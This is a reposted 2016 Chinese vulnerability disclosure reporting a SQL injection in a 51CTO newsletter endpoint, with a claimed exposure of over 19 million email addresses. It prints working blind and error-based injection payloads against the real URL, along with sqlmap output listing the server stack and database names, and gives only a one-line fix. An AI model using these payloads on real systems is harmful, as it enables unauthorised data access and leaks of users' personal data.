IT技术互动交流平台

51CTO某处SQL注射可导致1940多万邮箱列表泄露

作者:佚名  发布日期:2016-03-03 21:27:17

51CTO某处SQL注入可导致1940多万邮箱列表泄露

链接:http://newsletter2.51cto.com/new/openStats.php?serial=5629&email=xxxxxxx@gmail.com

注入参数:Parameter: serial (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: serial=5629 AND 2829=2829&email=xxxxxxx@gmail.comType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clausePayload: serial=5629 AND (SELECT 2347 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(2347=2347,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&email=xxxxxxx@gmail.com---[21:13:21] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.2.13, Apache 2.2.15back-end DBMS: MySQL 5.0[21:13:21] [INFO] fetching database names[21:13:21] [INFO] the SQL query used returns 5 entries[21:13:21] [INFO] resumed: information_schema[21:13:21] [INFO] resumed: ezem[21:13:21] [INFO] resumed: mysql[21:13:21] [INFO] resumed: test[21:13:21] [INFO] resumed: vpopmailavailable databases [5]:[*] ezem[*] information_schema[*] mysql[*] test[*] vpopmail


修复方案:
参数过滤

Tag标签: 可导   邮箱  
  • 专题推荐

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规